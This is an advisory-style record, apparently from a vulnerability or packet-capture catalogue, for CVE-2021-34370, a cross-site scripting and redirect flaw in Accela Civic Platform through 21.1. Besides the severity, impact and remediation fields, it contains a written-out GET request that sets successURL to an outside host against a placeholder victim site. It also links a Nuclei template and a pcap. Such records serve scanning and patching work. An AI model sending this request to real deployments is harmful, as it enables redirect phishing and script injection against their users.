| Title | Accela Civic Platform <=21.1 - Cross-Site Scripting |
|---|---|
| Author | 0x_Akoko |
| Severity | Medium |
| Impact | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application. |
| Remediation | Upgrade to a patched version of Accela Civic Platform (version >21.1) that includes proper input validation and sanitization. |
| CVSS Score | 6.1 |
| EPSS Score | 0.11651 |
| CVE ID | CVE-2021-34370 |
| CWE ID | CWE-79 |
| Tags | cve cve2021 xss redirect accela edb vuln |
Accela Civic Platform through 21.1 contains a cross-site scripting vulnerability via ssoAdapter/logoutAction.do successURL.
GET /ssoAdapter/logoutAction.do?servProvCode=SAFVC&successURL=https://interact.sh/ HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.3 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-34370.yaml
🦈 Packet Capture: ⬇️ Download cve-2021-34370.pcap
N/AN/A